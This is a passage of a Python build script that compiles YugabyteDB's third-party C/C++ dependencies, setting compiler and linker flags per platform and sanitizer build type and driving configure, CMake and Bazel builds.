get_deps_from_module_names([\n # Avoiding a name collision with the standard zlib module, hence \"zlib_dependency\".\n 'zlib_dependency',\n 'lz4',\n 'openssl',\n 'libev',\n 'rapidjson',\n 'squeasel',\n 'curl',\n 'hiredis',\n 'cqlsh',\n 'flex',\n 'bison',\n 'openldap',\n 'redis_cli',\n 'wyhash',\n 'jwt_cpp',\n ])\n for dep in self.dependencies:\n if dep.build_group != BuildGroup.COMMON:\n raise ValueError(\n \"Expected the initial group of dependencies to all be in the common build \"\n f\"group, found: {dep.build_group} for dependency {dep.name}\")\n\n if is_linux():\n self.dependencies += [\n get_build_def_module('libuuid').LibUuidDependency(),\n ]\n\n llvm_major_version: Optional[int] = self.compiler_choice.get_llvm_major_version()\n if (self.compiler_choice.is_clang() and\n llvm_major_version is not None and llvm_major_version >= 10):\n if self.toolchain:\n llvm_version_str = self.toolchain.get_llvm_version_str()\n else:\n llvm_version_str = self.compiler_choice.get_llvm_version_str()\n\n self.dependencies.append(\n get_build_def_module('llvm_libunwind').LlvmLibUnwindDependency(\n version=llvm_version_str\n ))\n 
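# With LLVM 13 and newer, libc++ and libc++abi are built together as a single\n # dependency; on older LLVM versions they are built as two separate dependencies.\n 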
libcxx_dep_module = get_build_def_module('llvm_libcxx')\n if llvm_major_version >= 13:\n self.dependencies.append(\n libcxx_dep_module.LibCxxWithAbiDependency(version=llvm_version_str))\n else:\n # It is important that we build libc++abi first, and only then build libc++.\n self.dependencies += [\n libcxx_dep_module.LlvmLibCxxAbiDependency(version=llvm_version_str),\n libcxx_dep_module.LlvmLibCxxDependency(version=llvm_version_str),\n ]\n else:\n self.dependencies.append(get_build_def_module('libunwind').LibUnwindDependency())\n\n self.dependencies.append(get_build_def_module('libbacktrace').LibBacktraceDependency())\n\n self.dependencies += get_deps_from_module_names(\n # On macOS, flex, bison, and krb5 depend on gettext, and we don't want to use gettext\n # from Homebrew.\n # libunistring is required by gettext.\n (\n ['libunistring', 'gettext'] if is_macos() else []\n ) + [\n 'ncurses',\n ] + (\n [] if is_macos() else ['libkeyutils', 'libverto', 'abseil', 'tcmalloc']\n ) + [\n 'libedit',\n 'icu4c',\n 'protobuf',\n 'crypt_blowfish',\n 'boost',\n 'gflags',\n 'glog',\n 'gperftools',\n 'googletest',\n 'snappy',\n 'crcutil',\n 'libcds',\n 'libuv',\n 'cassandra_cpp_driver',\n 'krb5',\n 'hdrhistogram',\n 'otel_proto',\n 'otel'\n ])\n for dep in self.dependencies:\n if dep.name in self.dependencies_by_name:\n raise ValueError(\"Duplicate dependency: %s\" % dep.name)\n self.dependencies_by_name[dep.name] = dep\n abseil_dep = self.dependencies_by_name.get('abseil')\n if abseil_dep is not None:\n tcmalloc_dep = cast(TCMallocDependency, self.dependencies_by_name['tcmalloc'])\n tcmalloc_dep.set_abseil_source_dir_basename(abseil_dep.get_source_dir_basename())\n\n def select_dependencies_to_build(self) -> None:\n self.selected_dependencies = []\n if self.args.dependencies:\n names = set([dep.name for dep in self.dependencies])\n for dep in self.args.dependencies:\n if dep not in names:\n fatal(\"Unknown dependency name: %s. Valid dependency names:\\n%s\",\n dep,\n (\" \" * 4 + (\"\\n\" + \" \" * 4).join(sorted(names))))\n for dep in self.dependencies:\n if dep.name in self.args.dependencies:\n self.selected_dependencies.append(dep)\n elif self.args.skip:\n skipped = set(self.args.skip.split(','))\n log(\"Skipping dependencies: %s\", sorted(skipped))\n self.selected_dependencies = []\n for dependency in self.dependencies:\n if dependency.name in skipped:\n skipped.remove(dependency.name)\n else:\n self.selected_dependencies.append(dependency)\n if skipped:\n raise ValueError(\"Unknown dependencies, cannot skip: %s\" % sorted(skipped))\n else:\n self.selected_dependencies = self.dependencies\n\n def _setup_path(self) -> None:\n add_path_entry(os.path.join(self.fs_layout.tp_installed_common_dir, 'bin'))\n add_homebrew_to_path()\n if self.compiler_choice.is_linux_clang():\n llvm_tool_dir = self.fs_layout.get_llvm_tool_dir()\n if create_llvm_tool_dir(self.compiler_choice.get_c_compiler(), llvm_tool_dir):\n add_path_entry(llvm_tool_dir)\n\n def run(self) -> None:\n if is_macos() and get_target_arch() == 'x86_64':\n os.environ['MACOSX_DEPLOYMENT_TARGET'] = get_min_supported_macos_version()\n if self.args.clean or self.args.clean_downloads:\n self.fs_layout.clean(self.selected_dependencies, self.args.clean_downloads)\n self.prepare_out_dirs()\n self._setup_path()\n\n # Populate the mapping from Bazel project subdirectory names to build directories.\n # This is used for generating compilation commands. 
We do not use ASAN/TSAN builds for this.\n self.bazel_path_mapping = {}\n for dep in self.dependencies:\n if dep.bazel_project_subdir_name is not None:\n build_root = self.fs_layout.get_build_dir_for_dependency(\n dep, dep.build_group.default_build_type())\n self.bazel_path_mapping[dep.bazel_project_subdir_name] = build_root\n\n self.build_one_build_type(BuildType.COMMON)\n build_types = [BuildType.UNINSTRUMENTED]\n\n if (is_linux() and\n self.compiler_choice.is_clang() and\n not self.args.skip_sanitizers and\n not using_linuxbrew() and\n # With --postprocess-compile-commands-only, we don't need to build ASAN/TSAN.\n not self.args.postprocess_compile_commands_only):\n # We only support ASAN/TSAN builds on Clang, when not using Linuxbrew.\n if not self.args.skip_asan:\n build_types.append(BuildType.ASAN)\n if not self.args.skip_tsan:\n build_types.append(BuildType.TSAN)\n log(f\"Full list of build types: {build_types}\")\n\n for build_type in build_types:\n self.build_one_build_type(build_type)\n\n fossa_config_deps = {\"remote-dependencies\": self.fossa_deps}\n with open(os.path.join(YB_THIRDPARTY_DIR, 'fossa-deps.json'), 'w') as output_file:\n json.dump(fossa_config_deps, output_file, indent=2)\n\n def prepare_out_dirs(self) -> None:\n dirs = [\n os.path.join(self.fs_layout.tp_installed_dir, build_type.dir_name())\n for build_type in BuildType\n ]\n libcxx_dirs = [os.path.join(dir_path, 'libcxx') for dir_path in dirs]\n for dir_path in dirs + libcxx_dirs:\n if self.args.verbose:\n log(\"Preparing output directory %s\", dir_path)\n util.mkdir_p(os.path.join(dir_path, 'bin'))\n lib_dir = os.path.join(dir_path, 'lib')\n util.mkdir_p(lib_dir)\n util.mkdir_p(os.path.join(dir_path, 'include'))\n # On some systems, autotools installs libraries to lib64 rather than lib. Fix this by\n # setting up lib64 as a symlink to lib. We have to do this step first to handle cases\n # where one third-party library depends on another.\n lib64_dir = os.path.join(dir_path, 'lib64')\n if os.path.exists(lib64_dir):\n if os.path.islink(lib64_dir):\n continue\n remove_path(lib64_dir)\n os.symlink('lib', lib64_dir)\n\n def add_include_path(self, include_path: str) -> None:\n if self.args.verbose:\n log(\"Adding an include path: %s\", include_path)\n cmd_line_arg = f'-I{include_path}'\n self.preprocessor_flags.append(cmd_line_arg)\n # Not adding to compiler_flags. We can add preprocessor flags to compiler flags when\n # building the dependency instead.\n\n def init_compiler_independent_flags(self, dep: Dependency) -> None:\n \"\"\"\n Initialize compiler and linker flags for a particular build type. 
We try to limit this\n function to flags that will work for most compilers we are using, which include various\n versions of GCC and Clang.\n \"\"\"\n self.preprocessor_flags = []\n self.ld_flags = []\n self.assembler_flags = []\n self.executable_only_ld_flags = []\n self.compiler_flags = []\n self.c_flags = []\n self.cxx_flags = []\n self.libs = []\n\n self.add_linuxbrew_flags()\n for build_type in set([BuildType.COMMON, self.build_type]):\n build_type_parent_dir = os.path.join(\n self.fs_layout.tp_installed_dir, build_type.dir_name())\n\n self.add_include_path(os.path.join(build_type_parent_dir, 'include'))\n self.add_lib_dir_and_rpath(os.path.join(build_type_parent_dir, 'lib'))\n\n self.compiler_flags += ['-fno-omit-frame-pointer', '-fPIC', '-O3', '-Wall']\n if is_linux():\n # On Linux, ensure we set a long enough rpath so we can change it later with chrpath,\n # patchelf, or a similar tool.\n self.add_rpath(PLACEHOLDER_RPATH)\n\n self.shared_lib_suffix = \"so\"\n\n # Currently linux/aarch64 build is optimized for Graviton2.\n if platform.uname().processor == 'aarch64':\n self.compiler_flags += GRAVITON_COMPILER_FLAGS\n\n elif is_macos():\n self.shared_lib_suffix = \"dylib\"\n\n # YugaByte builds with C++11, which on OS X requires using libc++ as the standard\n # library implementation. Some of the dependencies do not compile against libc++ by\n # default, so we specify it explicitly.\n self.cxx_flags.append(\"-stdlib=libc++\")\n self.ld_flags += [\"-lc++\", \"-lc++abi\"]\n\n # Build for macOS Mojave or later. See https://bit.ly/37myHbk\n extend_lists(\n [self.compiler_flags, self.ld_flags, self.assembler_flags],\n [\"-mmacosx-version-min=%s\" % get_min_supported_macos_version()])\n\n self.ld_flags.append(\"-Wl,-headerpad_max_install_names\")\n else:\n fatal(\"Unsupported platform: {}\".format(platform.system()))\n\n self.cxx_flags.append('-frtti')\n\n if self.build_type == BuildType.ASAN:\n self.compiler_flags += ASAN_COMPILER_FLAGS\n self.ld_flags += ASAN_LD_FLAGS\n\n if self.build_type == BuildType.TSAN:\n self.compiler_flags += TSAN_COMPILER_FLAGS\n\n def add_linuxbrew_flags(self) -> None:\n if using_linuxbrew():\n lib_dir = os.path.join(get_linuxbrew_dir(), 'lib')\n self.ld_flags.append(\" -Wl,-dynamic-linker={}\".format(os.path.join(lib_dir, 'ld.so')))\n self.add_lib_dir_and_rpath(lib_dir)\n\n def add_lib_dir_and_rpath(self, lib_dir: str) -> None:\n if self.args.verbose:\n log(\"Adding a library directory and RPATH at the end of linker flags: %s\", lib_dir)\n self.ld_flags.append(\"-L{}\".format(lib_dir))\n self.add_rpath(lib_dir)\n\n def prepend_lib_dir_and_rpath(self, lib_dir: str) -> None:\n if self.args.verbose:\n log(\"Adding a library directory and RPATH at the front of linker flags: %s\", lib_dir)\n self.ld_flags.insert(0, \"-L{}\".format(lib_dir))\n self.prepend_rpath(lib_dir)\n\n def add_rpath(self, path: str) -> None:\n log(\"Adding RPATH at the end of linker flags: %s\", path)\n self.ld_flags.append(get_rpath_flag(path))\n self.additional_allowed_shared_lib_paths.add(path)\n\n def prepend_rpath(self, path: str) -> None:\n log(\"Adding RPATH at the front of linker flags: %s\", path)\n self.ld_flags.insert(0, get_rpath_flag(path))\n self.additional_allowed_shared_lib_paths.add(path)\n\n def log_prefix(self, dep: Dependency) -> str:\n detail_components = self.compiler_choice.get_build_type_components(\n lto_type=self.lto_type, with_arch=False\n ) + [self.build_type.dir_name()]\n return '{} ({})'.format(dep.name, ', '.join(detail_components))\n\n def check_current_dir(self) 
-> None:\n current_dir = os.path.realpath(os.getcwd())\n top_dir = os.path.realpath(YB_THIRDPARTY_DIR)\n if current_dir == top_dir:\n raise IOError(\n \"Dependency build is not allowed to run with the current directory being \"\n f\"the top-level directory of yugabyte-db-thirdparty: {YB_THIRDPARTY_DIR}\")\n\n def build_with_configure(\n self,\n dep: Dependency,\n extra_args: List[str] = [],\n configure_cmd: List[str] = ['./configure'],\n install: List[str] = ['install'],\n run_autogen: bool = False,\n autoconf: bool = False,\n src_subdir_name: Optional[str] = None,\n post_configure_action: Optional[Callable] = None) -> None:\n self.check_current_dir()\n log_prefix = self.log_prefix(dep)\n dir_for_build = os.getcwd()\n if src_subdir_name:\n dir_for_build = os.path.join(dir_for_build, src_subdir_name)\n\n with PushDir(dir_for_build):\n log(\"Building in %s using the configure tool\", dir_for_build)\n try:\n if run_autogen:\n self.log_output(log_prefix, ['./autogen.sh'])\n if autoconf:\n self.log_output(log_prefix, ['autoreconf', '-i'])\n\n configure_args = (\n configure_cmd.copy() + ['--prefix={}'.format(self.prefix)] + extra_args\n )\n configure_args = get_arch_switch_cmd_prefix() + configure_args\n self.log_output(\n log_prefix,\n configure_args,\n disallowed_pattern=DISALLOWED_CONFIGURE_OUTPUT_RE)\n except Exception as ex:\n log(f\"The configure step failed. Looking for relevant files in {dir_for_build} \"\n f\"to show.\")\n num_files_shown = 0\n for root, dirs, files in os.walk('.'):\n for file_name in files:\n if file_name == 'config.log':\n file_path = os.path.abspath(os.path.join(root, file_name))\n log(\n f\"Contents of {file_path}:\\n\"\n f\"\\n\"\n f\"{read_file(file_path)}\\n\"\n f\"\\n\"\n f\"(End of {file_path}).\\n\"\n f\"\\n\"\n )\n num_files_shown += 1\n log(f\"Logged contents of {num_files_shown} relevant files in {dir_for_build}.\")\n raise\n\n if post_configure_action:\n post_configure_action()\n\n self.log_output(log_prefix, ['make', '-j{}'.format(get_make_parallelism())])\n if install:\n self.log_output(log_prefix, ['make'] + install)\n\n self.validate_build_output()\n\n def log_output(\n self,\n prefix: str,\n args: List[Any],\n disallowed_pattern: Optional[Pattern] = None) -> None:\n log_output_internal(\n prefix=prefix,\n args=args,\n disallowed_pattern=disallowed_pattern,\n color=not self.args.concise_output,\n hide_log_on_success=self.args.concise_output)\n\n def build_with_cmake(\n self,\n dep: Dependency,\n extra_args: List[str] = [],\n use_ninja_if_available: bool = True,\n src_subdir_name: Optional[str] = None,\n extra_build_tool_args: List[str] = [],\n should_install: bool = True,\n install_targets: List[str] = ['install'],\n shared_and_static: bool = False) -> None:\n self.check_current_dir()\n build_tool = 'make'\n if use_ninja_if_available:\n ninja_available = is_ninja_available()\n log('Ninja is %s', 'available' if ninja_available else 'unavailable')\n if ninja_available:\n build_tool = 'ninja'\n\n log(\"Building dependency %s using CMake. 
Build tool: %s\", dep, build_tool)\n log_prefix = self.log_prefix(dep)\n\n remove_path('CMakeCache.txt')\n remove_path('CMakeFiles')\n\n src_path = self.fs_layout.get_source_path(dep)\n if src_subdir_name is not None:\n src_path = os.path.join(src_path, src_subdir_name)\n\n args = ['cmake', src_path]\n if build_tool == 'ninja':\n args += ['-G', 'Ninja']\n args += self.get_common_cmake_flag_args(dep)\n if extra_args is not None:\n args += extra_args\n args += dep.get_additional_cmake_args(self)\n\n if shared_and_static and any(arg.startswith('-DBUILD_SHARED_LIBS=') for arg in args):\n raise ValueError(\n \"shared_and_static=True is specified but CMake arguments already mention \"\n \"-DBUILD_SHARED_LIBS: %s\" % args)\n\n if '-DBUILD_SHARED_LIBS=OFF' not in args and not shared_and_static:\n # TODO: a better approach for setting CMake arguments from multiple places.\n args.append('-DBUILD_SHARED_LIBS=ON')\n\n def do_build_with_cmake(additional_cmake_args: List[str] = []) -> None:\n final_cmake_args = args + additional_cmake_args\n log(\"CMake command line (one argument per line):\\n%s\" %\n format_cmake_args_for_log(final_cmake_args))\n cmake_configure_script_path = os.path.abspath('yb_build_with_cmake.sh')\n\n build_tool_cmd = [\n build_tool, '-j{}'.format(get_make_parallelism())\n ] + extra_build_tool_args\n\n log(\"Writing the command line for the CMake-based build to %s\",\n os.path.abspath(cmake_configure_script_path))\n with open(cmake_configure_script_path, 'w') as cmake_configure_script_file:\n cmake_configure_script_file.write('\\n'.join([\n '#!/usr/bin/env bash',\n 'set -euxo pipefail',\n 'cd \"$( dirname \"$0\" )\"',\n '. \"./%s\"' % DEPENDENCY_ENV_FILE_NAME,\n shlex_join(final_cmake_args,\n one_arg_per_line=True),\n shlex_join(build_tool_cmd)\n ]) + '\\n')\n os.chmod(cmake_configure_script_path,\n stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR | stat.S_IRGRP | stat.S_IWGRP |\n stat.S_IROTH)\n\n self.log_output(log_prefix, final_cmake_args)\n\n if build_tool == 'ninja':\n dep.postprocess_ninja_build_file(self, 'build.ninja')\n\n self.log_output(log_prefix, build_tool_cmd)\n\n if should_install:\n self.log_output(log_prefix, [build_tool] + install_targets)\n\n with open('compile_commands.json') as compile_commands_file:\n compile_commands = json.load(compile_commands_file)\n\n for command_item in compile_commands:\n command_args = command_item['command'].split()\n if self.build_type == BuildType.ASAN:\n assert_list_contains(command_args, '-fsanitize=address')\n assert_list_contains(command_args, '-fsanitize=undefined')\n if self.build_type == BuildType.TSAN:\n assert_list_contains(command_args, '-fsanitize=thread')\n\n if shared_and_static:\n for build_shared_libs_value, subdir_name in (\n ('ON', 'shared'),\n ('OFF', 'static')\n ):\n build_dir = os.path.join(os.getcwd(), subdir_name)\n util.mkdir_p(build_dir)\n build_shared_libs_cmake_arg = '-DBUILD_SHARED_LIBS=%s' % build_shared_libs_value\n log(\"Building dependency '%s' for build type '%s' with option: %s\",\n dep.name, self.build_type, build_shared_libs_cmake_arg)\n with PushDir(build_dir):\n do_build_with_cmake([build_shared_libs_cmake_arg])\n self.validate_build_output()\n else:\n do_build_with_cmake()\n self.validate_build_output()\n\n def build_with_bazel(\n self,\n dep: Dependency,\n verbose_output: bool = True,\n should_clean: bool = True,\n targets: List[str] = []) -> None:\n log_prefix = self.log_prefix(dep)\n if should_clean:\n self.log_output(log_prefix, ['bazel', 'clean', '--expunge'])\n\n # Need to remove the space after 
isystem so replacing the space separators with colons\n # works properly.\n bazel_cxxopts = os.environ[\"CXXFLAGS\"].replace(\"isystem \", \"isystem\").replace(\" \", \":\")\n # Add stdlib=libc++ to avoid linking with libstdc++.\n bazel_linkopts = os.environ[\"LDFLAGS\"].replace(\" \", \":\")\n\n # Build without curses for more readable build output.\n build_command = [\"bazel\", \"build\", \"--curses=no\"]\n if verbose_output:\n build_command.append(\"--subcommands\")\n build_command += [\"--action_env\", f\"BAZEL_CXXOPTS={bazel_cxxopts}\"]\n build_command += [\"--action_env\", f\"BAZEL_LINKOPTS={bazel_linkopts}\"]\n\n # Need to explicitly pass environment variables which we want to be available.\n env_vars_to_copy = [\n \"CC\",\n \"CXX\",\n \"PATH\",\n \"YB_BAZEL_BUILD_DIR\",\n \"YB_THIRDPARTY_REAL_C_COMPILER\",\n \"YB_THIRDPARTY_REAL_CXX_COMPILER\",\n \"YB_THIRDPARTY_USE_CCACHE\",\n compile_commands.TMP_DIR_ENV_VAR_NAME,\n ]\n for env_var in env_vars_to_copy:\n if env_var not in os.environ:\n log(f\"Environment variable {env_var} not found. Not passing it to Bazel.\")\n continue\n build_command += [\"--action_env\", f\"{env_var}={os.environ[env_var]}\"]\n\n build_command.append(\"--verbose_failures\")\n\n build_script_path = 'yb_build_with_bazel.sh'\n with open(build_script_path, 'w') as build_script_file:\n build_script_file.write('\\n'.join([\n '#!/usr/bin/env bash',\n 'set -euxo pipefail',\n 'cd \"$( dirname \"$0\" )\"',\n '. \"./%s\"' % DEPENDENCY_ENV_FILE_NAME,\n 'for target in ' + shlex_join(targets) + '; do',\n ' ' + shlex_join(build_command) + ' \"$target\"',\n 'done',\n ]))\n os.chmod(build_script_path, 0o755)\n\n for target in targets:\n self.log_output(log_prefix, build_command + [target])\n\n def install_bazel_build_output(\n self,\n dep: Dependency,\n src_file: str,\n dest_file: str,\n src_folder: str,\n is_shared: bool) -> None:\n log_prefix = self.log_prefix(dep)\n src_path = f'bazel-bin/{src_folder}/{src_file}'\n dest_path = os.path.join(self.prefix_lib, dest_file)\n\n # Fix permissions on libraries. Bazel builds write-protected files by default, which\n # prevents overwriting when building thirdparty multiple times.\n self.log_output(log_prefix, ['chmod', '755' if is_shared else '644', src_path])\n self.log_output(log_prefix, ['cp', src_path, dest_path])\n\n def validate_build_output(self) -> None:\n if is_macos():\n target_arch = get_target_arch()\n # 'file' output for Mach-O objects ends with the architecture name, e.g.\n # \"foo.o: Mach-O 64-bit object arm64\", so a suffix check below is enough\n # to catch objects built for the wrong macOS architecture.\n disallowed_suffix = ' ' + get_other_macos_arch(target_arch)\n log(\"Verifying architecture of object files and libraries in %s (should be %s)\",\n os.getcwd(), target_arch)\n object_files = subprocess.check_output(\n ['find', os.getcwd(), '-name', '*.o', '-or', '-name', '*.dylib']\n ).strip().decode('utf-8').split('\\n')\n for object_file_path in object_files:\n file_type = subprocess.check_output(['file', object_file_path]).strip().decode(\n 'utf-8')\n if file_type.endswith(disallowed_suffix):\n raise ValueError(\n \"Incorrect object file architecture generated for %s (%s expected): %s\" % (\n object_file_path, target_arch, file_type))\n\n def check_spurious_a_out_file(self) -> None:\n \"\"\"\n Sometimes an a.out file gets generated in the top-level directory. This is an attempt to\n catch it and figure out how it is being generated.\n \"\"\"\n spurious_a_out_path = os.path.join(YB_THIRDPARTY_DIR, 'a.out')\n if os.path.exists(spurious_a_out_path):\n log(f'The spurious a.out file got generated in {YB_THIRDPARTY_DIR}. 
Deleting it.'\n 'In the future, we will track down where it is coming from.')\n os.remove(spurious_a_out_path)\n\n def build_one_build_type(self, build_type: BuildType) -> None:\n if (build_type != BuildType.COMMON and\n self.args.build_type is not None and\n build_type != self.args.build_type):\n log(\"Skipping build type %s because build type %s is specified in the arguments\",\n build_type, self.args.build_type)\n return\n\n self.set_build_type(build_type)\n build_group = (BuildGroup.COMMON if build_type == BuildType.COMMON\n else BuildGroup.POTENTIALLY_INSTRUMENTED)\n\n dependencies_matching_group = [\n dep for dep in self.selected_dependencies if dep.build_group == build_group\n ]\n for dep in dependencies_matching_group:\n self.perform_pre_build_steps(dep)\n\n for dep in dependencies_matching_group:\n should_build = dep.should_build(self)\n should_rebuild = self.should_rebuild_dependency(dep)\n if should_build and should_rebuild:\n self.build_dependency(dep, only_process_flags=False)\n self.check_spurious_a_out_file()\n else:\n self.build_dependency(dep, only_process_flags=True)\n log(f\"Skipped dependency {dep.name}: \"\n f\"should_build={should_build}, \"\n f\"should_rebuild={should_rebuild}.\")\n\n def get_install_prefix(self) -> str:\n return os.path.join(self.fs_layout.tp_installed_dir, self.build_type.dir_name())\n\n def set_build_type(self, build_type: BuildType) -> None:\n self.build_type = build_type\n self.prefix = self.get_install_prefix()\n self.prefix_bin = os.path.join(self.prefix, 'bin')\n self.prefix_lib = os.path.join(self.prefix, 'lib')\n self.prefix_include = os.path.join(self.prefix, 'include')\n\n def init_flags(self, dep: Dependency) -> None:\n \"\"\"\n Initializes compiler and linker flags. No flag customizations should be transferred from one\n dependency to another.\n \"\"\"\n self.init_compiler_independent_flags(dep)\n\n if not is_macos() and self.compiler_choice.using_clang():\n # Special setup for Clang on Linux.\n compiler_choice = self.compiler_choice\n llvm_major_version: Optional[int] = compiler_choice.get_llvm_major_version()\n if llvm_major_version is not None and llvm_major_version >= 10:\n self.init_linux_clang_flags(dep)\n else:\n raise ValueError(f\"Unknown or unsupported LLVM major version: {llvm_major_version}\")\n\n if self.compiler_choice.using_gcc():\n self.cxx_flags.append('-fext-numeric-literals')\n\n def get_libcxx_dirs(self, libcxx_installed_suffix: str) -> Tuple[str, str]:\n libcxx_installed_path = os.path.join(\n self.fs_layout.tp_installed_dir, libcxx_installed_suffix, 'libcxx')\n libcxx_installed_include = os.path.join(libcxx_installed_path, 'include', 'c++', 'v1')\n libcxx_installed_lib = os.path.join(libcxx_installed_path, 'lib')\n return libcxx_installed_include, libcxx_installed_lib\n\n def init_linux_clang_flags(self, dep: Dependency) -> None:\n \"\"\"\n Flags for Clang. We are using LLVM-supplied libunwind, and in most cases, compiler-rt in
We are using LLVM-supplied libunwind, and in most cases, compiler-rt in\n this configuration.\n \"\"\"\n llvm_major_version = self.compiler_choice.get_llvm_major_version()\n assert llvm_major_version is not None\n\n if not using_linuxbrew():\n # We don't build compiler-rt for Linuxbrew yet.\n # TODO: we can build compiler-rt here the same way we build other LLVM components,\n # such as libunwind, libc++abi, and libc++.\n self.ld_flags.append('-rtlib=compiler-rt')\n\n self.ld_flags.append('-fuse-ld=lld')\n if self.lto_type is not None:\n self.compiler_flags.append('-flto=%s' % self.lto_type)\n\n clang_linuxbrew_isystem_flags = []\n\n if using_linuxbrew():\n linuxbrew_dir = get_linuxbrew_dir()\n assert linuxbrew_dir is not None\n self.ld_flags.append(\n '-Wl,--dynamic-linker=%s' % os.path.join(linuxbrew_dir, 'lib', 'ld.so'))\n self.compiler_flags.append('-nostdinc')\n self.compiler_flags.append('--gcc-toolchain={}'.format(linuxbrew_dir))\n\n assert self.compiler_choice.cc is not None\n clang_include_dir = get_clang_include_dir(self.compiler_choice.cc)\n\n clang_linuxbrew_isystem_flags = [\n '-isystem', clang_include_dir,\n\n # This is the include directory of the Linuxbrew GCC 5.5 / glibc 2.23 bundle.\n '-isystem', os.path.join(linuxbrew_dir, 'include')\n ]\n\n if self.build_type == BuildType.COMMON:\n self.preprocessor_flags.extend(clang_linuxbrew_isystem_flags)\n return\n\n # TODO mbautin: refactor to polymorphism\n is_libcxxabi = dep.name.endswith('_libcxxabi')\n is_libcxx = dep.name.endswith('_libcxx')\n\n is_libcxx_with_abi = dep.name.endswith('_libcxx_with_abi')\n\n log(\"Dependency name: %s, is_libcxxabi: %s, is_libcxx: %s\",\n dep.name, is_libcxxabi, is_libcxx)\n\n if self.build_type == BuildType.ASAN:\n if is_libcxxabi or is_libcxx_with_abi:\n # To avoid an infinite loop in UBSAN.\n # https://monorail-prod.appspot.com/p/chromium/issues/detail?id=609786\n # This comment:\n # https://gist.githubusercontent.com/mbautin/ad9ea4715669da3b3a5fb9495659c4a9/raw\n self.compiler_flags.append('-fno-sanitize=vptr')\n\n # Unfortunately, for the combined libc++ and libc++abi build in Clang 13 or later,\n # we also disable this check in libc++, where in theory it could have been\n # enabled.\n\n # The description of this check from\n # https://clang.llvm.org/docs/UndefinedBehaviorSanitizer.html:\n #\n # -fsanitize=vptr: Use of an object whose vptr indicates that it is of the wrong\n # dynamic type, or that its lifetime has not begun or has ended. Incompatible with\n # -fno-rtti. 
Link must be performed by clang++, not clang, to make sure C++-specific\n # parts of the runtime library and C++ standard libraries are present.\n\n assert self.compiler_choice.cc is not None\n ubsan_lib_candidates = []\n ubsan_lib_found = False\n for ubsan_lib_arch_suffix in ['', f'-{platform.processor()}']:\n ubsan_lib_name = f'clang_rt.ubsan_minimal{ubsan_lib_arch_suffix}'\n ubsan_lib_file_name = f'lib{ubsan_lib_name}.so'\n compiler_rt_lib_dir_as_list = get_clang_library_dir(\n self.compiler_choice.get_c_compiler(),\n look_for_file=ubsan_lib_file_name)\n if not compiler_rt_lib_dir_as_list:\n continue\n assert len(compiler_rt_lib_dir_as_list) == 1\n compiler_rt_lib_dir = compiler_rt_lib_dir_as_list[0]\n self.add_lib_dir_and_rpath(compiler_rt_lib_dir)\n\n ubsan_lib_so_path = os.path.join(compiler_rt_lib_dir, ubsan_lib_file_name)\n ubsan_lib_candidates.append(ubsan_lib_so_path)\n if os.path.exists(ubsan_lib_so_path):\n self.ld_flags.append(f'-l{ubsan_lib_name}')\n ubsan_lib_found = True\n break\n if not ubsan_lib_found:\n raise IOError(\n f\"UBSAN library not found at any of the paths: {ubsan_lib_candidates}\")\n llvm_major_version = self.compiler_choice.get_llvm_major_version()\n assert llvm_major_version is not None\n if (llvm_major_version >= 14 and\n dep.build_group != BuildGroup.COMMON and\n dep.name != 'crcutil'):\n self.compiler_flags += ['-mllvm', '-asan-use-private-alias=1']\n\n if self.build_type == BuildType.TSAN and llvm_major_version >= 13:\n self.executable_only_ld_flags.extend(['-fsanitize=thread'])\n\n self.ld_flags += ['-lunwind']\n\n libcxx_installed_include, libcxx_installed_lib = self.get_libcxx_dirs(\n self.build_type.dir_name())\n log(\"libc++ include directory: %s\", libcxx_installed_include)\n log(\"libc++ library directory: %s\", libcxx_installed_lib)\n\n if not is_libcxx and not is_libcxxabi and not is_libcxx_with_abi:\n log(\"Adding special compiler/linker flags for Clang 10+ for dependencies other than \"\n \"libc++\")\n self.ld_flags += ['-stdlib=libc++', '-lc++', '-lc++abi']\n # TODO(asrivastava): We might not need libc++ in cxxflags but removing it causes certain\n # builds to fail.\n self.cxx_flags += ['-stdlib=libc++', '-nostdinc++']\n self.preprocessor_flags.extend(['-isystem', libcxx_installed_include])\n self.prepend_lib_dir_and_rpath(libcxx_installed_lib)\n\n if is_libcxx:\n log(\"Adding special compiler/linker flags for Clang for libc++\")\n # This is needed for libc++ to find libc++abi headers.\n assert_dir_exists(libcxx_installed_include)\n self.preprocessor_flags.append('-I%s' % libcxx_installed_include)\n # libc++ build needs to be able to find libc++abi library installed here.\n self.ld_flags.append('-L%s' % libcxx_installed_lib)\n\n if is_libcxx or is_libcxxabi or is_libcxx_with_abi:\n log(\"Adding special linker flags for Clang for libc++ or libc++abi\")\n # libc++abi needs to be able to find libcxx at runtime, even though it can't always find\n # it at build time because libc++abi is built first.\n self.add_rpath(libcxx_installed_lib)\n\n self.preprocessor_flags.extend(clang_linuxbrew_isystem_flags)\n\n no_unused_arg = '-Wno-error=unused-command-line-argument'\n self.compiler_flags.append(no_unused_arg)\n self.ld_flags.append(no_unused_arg)\n\n log(\"Flags after the end of setup for Clang:\")\n log(\"compiler_flags : %s\", self.compiler_flags)\n log(\"cxx_flags : %s\", self.cxx_flags)\n log(\"c_flags : %s\", self.c_flags)\n log(\"ld_flags : %s\", self.ld_flags)\n log(\"preprocessor_flags : %s\", self.preprocessor_flags)\n\n def 
get_effective_compiler_flags(self, dep: Dependency) -> List[str]:\n        return self.compiler_flags + dep.get_additional_compiler_flags(self)\n\n    def get_effective_cxx_flags(self, dep: Dependency) -> List[str]:\n        # The C++ standard must match CMAKE_CXX_STANDARD in the top-level CMakeLists.txt file in\n        # the YugabyteDB source tree.\n        return (self.cxx_flags +\n                self.get_effective_compiler_flags(dep) +\n                dep.get_additional_cxx_flags(self) +\n                ['-std=c++{}'.format(dep.get_cxx_version(self))])\n\n    def get_effective_c_flags(self, dep: Dependency) -> List[str]:\n        return (self.c_flags +\n                self.get_effective_compiler_flags(dep) +\n                dep.get_additional_c_flags(self))\n\n    def get_effective_ld_flags(self, dep: Dependency) -> List[str]:\n        return (dep.get_additional_leading_ld_flags(self) +\n                self.ld_flags +\n                dep.get_additional_ld_flags(self))\n\n    def get_effective_assembler_flags(self, dep: Dependency) -> List[str]:\n        return self.assembler_flags + dep.get_additional_assembler_flags(self)\n\n    def get_effective_executable_ld_flags(self, dep: Dependency) -> List[str]:\n        return self.ld_flags + self.executable_only_ld_flags + dep.get_additional_ld_flags(self)\n\n    def get_effective_preprocessor_flags(self, dep: Dependency) -> List[str]:\n        return list(self.preprocessor_flags)\n\n    def get_common_cmake_flag_args(self, dep: Dependency) -> List[str]:\n        assert not dep.use_cppflags_env_var(), \\\n            f'Dependency 